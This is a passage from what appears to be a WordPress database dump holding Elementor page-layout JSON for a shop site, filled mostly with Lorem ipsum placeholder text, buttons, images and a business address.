Doe\",\"testimonial_job\":\"Designer\",\"_background_background\":\"classic\",\"_background_color\":\"#BDD6BD8F\"},\"elements\":[],\"widgetType\":\"testimonial\"}],\"isInner\":false},{\"id\":\"4cc038b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f7f100a\",\"elType\":\"widget\",\"settings\":{\"testimonial_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"testimonial_name\":\"John Doe\",\"testimonial_job\":\"Designer\",\"_background_background\":\"classic\",\"_background_color\":\"#BDD6BD8F\"},\"elements\":[],\"widgetType\":\"testimonial\"}],\"isInner\":false},{\"id\":\"f270d26\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"802fcc9\",\"elType\":\"widget\",\"settings\":{\"testimonial_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"testimonial_name\":\"John Doe\",\"testimonial_job\":\"Designer\",\"_background_background\":\"classic\",\"_background_color\":\"#BDD6BD8F\"},\"elements\":[],\"widgetType\":\"testimonial\"}],\"isInner\":false},{\"id\":\"53f4aeb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f85352a\",\"elType\":\"widget\",\"settings\":{\"testimonial_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"testimonial_name\":\"John Doe\",\"testimonial_job\":\"Designer\",\"_background_background\":\"classic\",\"_background_color\":\"#BDD6BD8F\"},\"elements\":[],\"widgetType\":\"testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"204ce8a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ef00601\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0d3e7a9\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-220,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4><strong>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/strong><\\/h4>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8819,1521,'_elementor_page_assets','a:0:{}'),(8821,1522,'_elementor_edit_mode','builder'),(8822,1522,'_elementor_template_type','wp-page'),(8823,1522,'_elementor_version','3.7.8'),(8824,1522,'_wp_page_template','elementor_canvas'),(8825,1522,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"104\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":89.680999999999997,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\",\"text_color\":\"#FFFFFF\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#F78A00\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":10.272},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"623a672\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"30\"},\"elements\":[{\"id\":\"739cf25\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"classic\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"d837b3b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#3AB2A7\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"4cb627c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"fafaf1c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#092220\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"5913281\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f899190\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f16dea3\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"cc1fd22\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"f37b36f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fa36b21\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo<\\/p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"aa95f02\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF6E00\",\"_margin\":{\"unit\":\"px\",\"top\":\"-24\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"374288e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"30868ff\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"_margin\":{\"unit\":\"px\",\"top\":\"19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"da958fb\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#DDD6D636\"},\"elements\":[{\"id\":\"708fcb4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"52f19eb\",\"elType\":\"widget\",\"settings\":{\"tabs\":[{\"tab_title\":\"Accordion #1\",\"tab_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"_id\":\"c1c0cb1\"},{\"tab_title\":\"Accordion #2\",\"tab_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"_id\":\"c81da6b\"},{\"_id\":\"de1d949\",\"tab_title\":\"Accordion Title\"},{\"_id\":\"cb17b05\",\"tab_title\":\"Accordion Title\"}],\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"faq_schema\":\"yes\",\"border_width\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_element_width\":\"inherit\",\"_animation\":\"none\"},\"elements\":[],\"widgetType\":\"accordion\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e357abe\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"b3b6eb2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ae4d7ac\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"20a83dc\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bc85492\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"a53f4e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"88d8734\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"006d2d2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"fb06b27\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6df56a4\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"3427821\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"981ddd1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"769b005\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ef95559\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"4c2bf26\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"550a2fe\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"d29feb9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"c8fdf6d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a5bf1ad\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"9453712\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"e15dab4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6c1b003\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"71c81df\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f37c86d\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f839c1c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0d6b040\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e374c42\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"27bc579\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"e6bf144\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"4958df1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"48ae73c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4fbe7c9\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7f118ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"1094c04\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"23f1949\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"564a60c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"4f7aa47\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6b7196e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"db3e45f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"c6757ae\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"f80f2bc\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"fe9d098\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1279df7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"61ee343\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"1189e91\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#E2E4E28C\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know 